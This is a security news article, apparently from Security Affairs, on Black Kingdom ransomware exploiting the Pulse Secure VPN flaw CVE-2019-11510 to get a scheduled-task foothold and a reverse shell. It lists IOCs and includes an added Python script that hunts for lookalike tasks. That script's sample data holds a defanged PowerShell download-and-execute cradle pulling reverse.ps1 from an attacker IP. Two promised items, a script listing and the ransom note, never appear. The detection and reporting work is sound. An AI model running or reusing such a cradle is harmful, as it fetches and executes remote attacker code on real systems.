Black Kingdom ransomware operators exploit Pulse VPN flaws

Black Kingdom ransomware operators are targeting organizations using unpatched Pulse Secure VPN software to deploy their malware.

Researchers from security firm REDTEAM reported that the operators behind the Black Kingdom ransomware are targeting enterprises by exploiting the CVE-2019-11510 flaw in Pulse Secure VPN software to gain access to the network.

Black Kingdom ransomware was first spotted in late February by security researcher GrujaRS. The malicious code encrypts files and appends the .DEMON extension to the filenames of the encrypted documents.

Early this year, the U.S. Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA) warned organizations that attackers continue to exploit the well known Pulse Secure VPN vulnerability tracked as CVE-2019-11510.

The CVE-2019-11510 flaw in Pulse Connect Secure is a critical arbitrary file read vulnerability.

“Unauthenticated remote attacker with network access via HTTPS can send a specially crafted URI to perform an arbitrary file reading vulnerability,” reads the advisory.

The vulnerability is easily exploitable using publicly available proof-of-concept code. The flaw can be chained with the CVE-2019-11539 remote command injection issue to gain access to private VPN networks.

The vulnerability was addressed in April 2019, but many organizations delayed updating their servers.

Researchers from security firm REDTEAM discovered that the Black Kingdom ransomware establishes persistence by impersonating a legitimate scheduled task for Google Chrome. The attackers used a name that differs from the legitimate task by a single letter:

  • GoogleUpdateTaskMachineUSA - Black Kingdom task
  • GoogleUpdateTaskMachineUA - legitimate Google Chrome task

Redteam researchers published an analysis detailing the TTPs and IOCs for the Black Kingdom ransomware.

“Attackers gained initial access to the infrastructure via Pulse Secure VPN vulnerability [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510]. For persistence they use a scheduled task [https://attack.mitre.org/techniques/T1053/],” reads the analysis published by Redteam. “Task name is GoogleUpdateTaskMachineUSA, which resembles a legitimate task of Google Chrome that ends with UA, not USA.”

REDTEAM researchers reported that the scheduled task runs a Base64-encoded command in a hidden PowerShell window to fetch a script named “reverse.ps1”, which establishes a reverse shell from the infected machine.
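As an added example, not code from the REDTEAM analysis or from this page, the script below hunts for the persistence pattern just described: Task Scheduler XML exports whose task name is an edit or two away from a known legitimate name, and whose action launches PowerShell with a hidden window and an -EncodedCommand payload, which it decodes (PowerShell expects Base64 of the UTF-16LE script text). The allow-list of legitimate task names, the two sample task exports and the stand-in encoded command are constructed for the example; the real command text is not reproduced on this page.

```python
"""Hunt Task Scheduler XML exports for lookalike task names that launch a
hidden, Base64-encoded PowerShell command (added example; sample data is
constructed, not taken from the incident)."""
import base64
import re
import xml.etree.ElementTree as ET

# Namespace used by Task Scheduler XML (schtasks /query /xml, Export-ScheduledTask).
NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"

# Assumed allow-list of legitimate task names; extend it for your own fleet.
KNOWN_TASKS = {"GoogleUpdateTaskMachineUA", "GoogleUpdateTaskMachineCore"}

# -EncodedCommand and the abbreviations PowerShell accepts, then the Base64 blob.
ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
# -WindowStyle Hidden and its short forms.
HIDDEN_RE = re.compile(r"-w(?:in|indowstyle)?\s+hidden", re.I)


def edit_distance(a, b):
    """Levenshtein distance, used to catch one-letter lookalike names."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_of(name, known=KNOWN_TASKS, max_dist=2):
    """Known task name within max_dist edits of `name`; exact matches are legitimate."""
    if name in known:
        return None
    dist, match = min((edit_distance(name, k), k) for k in known)
    return match if dist <= max_dist else None


def decode_encoded_command(arguments):
    """Decode a -EncodedCommand argument (Base64 of UTF-16LE text), or None."""
    m = ENC_RE.search(arguments)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not valid Base64/UTF-16: leave the raw argument for manual review


def analyze_task(xml_text):
    """Return a finding dict for one exported task."""
    root = ET.fromstring(xml_text)
    uri = root.findtext(f"{NS}RegistrationInfo/{NS}URI") or ""
    name = uri.rsplit("\\", 1)[-1]          # strip the task-folder path
    exec_el = root.find(f"{NS}Actions/{NS}Exec")
    command = exec_el.findtext(f"{NS}Command") or "" if exec_el is not None else ""
    arguments = exec_el.findtext(f"{NS}Arguments") or "" if exec_el is not None else ""
    decoded = decode_encoded_command(arguments)
    finding = {
        "name": name,
        "command": command,
        "lookalike_of": lookalike_of(name),
        "hidden_window": bool(HIDDEN_RE.search(arguments)),
        "encoded_command": decoded,
    }
    finding["suspicious"] = bool(finding["lookalike_of"] or finding["hidden_window"] or decoded)
    return finding


def hunt(task_xmls):
    """Findings flagged as suspicious, in input order."""
    return [f for f in (analyze_task(x) for x in task_xmls) if f["suspicious"]]


# Constructed export of the legitimate Chrome updater task.
LEGIT_TASK = r"""<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\GoogleUpdateTaskMachineUA</URI></RegistrationInfo>
  <Actions Context="Author"><Exec>
    <Command>C:\Program Files (x86)\Google\Update\GoogleUpdate.exe</Command>
    <Arguments>/ua /installsource scheduler</Arguments>
  </Exec></Actions>
</Task>"""

# Constructed stand-in for the attacker's payload: a defanged download cradle for
# reverse.ps1, encoded the way -EncodedCommand expects. Not the real command text.
SAMPLE_COMMAND = "IEX (New-Object Net.WebClient).DownloadString('hxxp://198.13.49[.]179/reverse.ps1')"
SAMPLE_B64 = base64.b64encode(SAMPLE_COMMAND.encode("utf-16-le")).decode("ascii")
MALICIOUS_TASK = (
    '<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
    "<RegistrationInfo><URI>\\GoogleUpdateTaskMachineUSA</URI></RegistrationInfo>"
    '<Actions Context="Author"><Exec><Command>powershell.exe</Command>'
    f"<Arguments>-NoProfile -w hidden -enc {SAMPLE_B64}</Arguments>"
    "</Exec></Actions></Task>"
)

if __name__ == "__main__":
    for f in hunt([LEGIT_TASK, MALICIOUS_TASK]):
        print(f"[!] {f['name']}: mimics {f['lookalike_of']}, hidden={f['hidden_window']}")
        if f["encoded_command"]:
            print("    decoded:", f["encoded_command"])
```

On a live host, feed it the XML from `schtasks /query /xml ONE` or `Export-ScheduledTask` for every registered task. A near-miss name alone deserves a look; a decoded command that reaches off-host for a script, as the task described above did, is an immediate triage item.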

Below is the content of the cversions_cache.ps1 PowerShell script:

The “reverse.ps1” script is hosted at 198.13.49[.]179, an address operated by the provider Choopa that has also been used by other cybercriminal gangs.

“It [198.13.49[.]179] resolves to three domains, the third one being connected to other servers in the U.S. and Italy hosting Android and cryptocurrency mining malware.” reported BleepingComputer.

  • host.cutestboty.com
  • keepass.cutestboty.com
  • anno1119.com

Below is the ransom note dropped by the ransomware on infected hosts. The operators demand $10,000 worth of Bitcoin to decrypt the files, threatening otherwise to destroy or sell them.


Pierluigi Paganini

(SecurityAffairs – Black Kingdom ransomware, ransomware)


Pierluigi Paganini is a member of the ENISA (European Union Agency for Network and Information Security) Threat Landscape Stakeholder Group and the Cyber G7 Group; he is also a Security Evangelist, Security Analyst and Freelance Writer. Editor-in-Chief at "Cyber Defense Magazine", Pierluigi is a cyber security expert with over 20 years of experience in the field and a Certified Ethical Hacker (EC-Council, London). A passion for writing and a strong belief that security is founded on sharing and awareness led Pierluigi to found the security blog "Security Affairs", recently named a Top National Security Resource for the US. Pierluigi is a member of "The Hacker News" team and writes for major publications in the field such as Cyber War Zone, ICTTF, Infosec Island, Infosec Institute, The Hacker News Magazine and many other security magazines. Author of the books "The Deep Dark Web" and "Digital Virtual Currency and Bitcoin".
